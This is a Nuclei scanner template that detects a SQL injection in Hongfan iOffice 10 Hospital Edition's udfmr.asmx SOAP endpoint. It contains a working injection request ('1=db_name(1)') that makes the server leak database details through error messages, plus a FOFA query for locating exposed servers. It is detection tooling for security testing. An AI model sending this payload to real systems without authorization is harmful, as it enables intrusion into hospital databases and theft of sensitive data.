id: hongfan-ioffice-sqli info: name: Hongfan OA udfmr.asmx - SQL injection author: SleepingBag945 severity: high description: | There is a SQL injection vulnerability in Hongfan iOffice 10 Hospital Edition, which can be exploited by attackers to obtain sensitive database information. reference: - https://github.com/lal0ne/vulnerability/blob/main/%E7%BA%A2%E5%B8%86OA/iOffice_sqlscan/sql.py - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%BA%A2%E5%B8%86%E5%8C%BB%E7%96%97%E4%BA%91%20OA%20udfmr.asmx%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: verified: true max-request: 1 fofa-query: app="红帆-ioffice" tags: hongfan,oa,sqli http: - raw: - | POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 SOAPAction: http://tempuri.org/ioffice/udfmr/GetEmpSearch 1=db_name(1) matchers-condition: and matchers: - type: word part: body words: - "System.Data.SqlClient.SqlException:" - "nvarchar" condition: and - type: word part: header words: - "text/xml" - type: status status: - 500 # digest: 4a0a00473045022100ab635da4a8372e7658b8d77e2f8d7dbb9ee5b591a8f09602674ec79866beef2b0220696c21a967473b2a408c567b7da2d69e39f96f3e74a639953255245c0bd2ce34:922c64590222798bb761d5b6d8e72950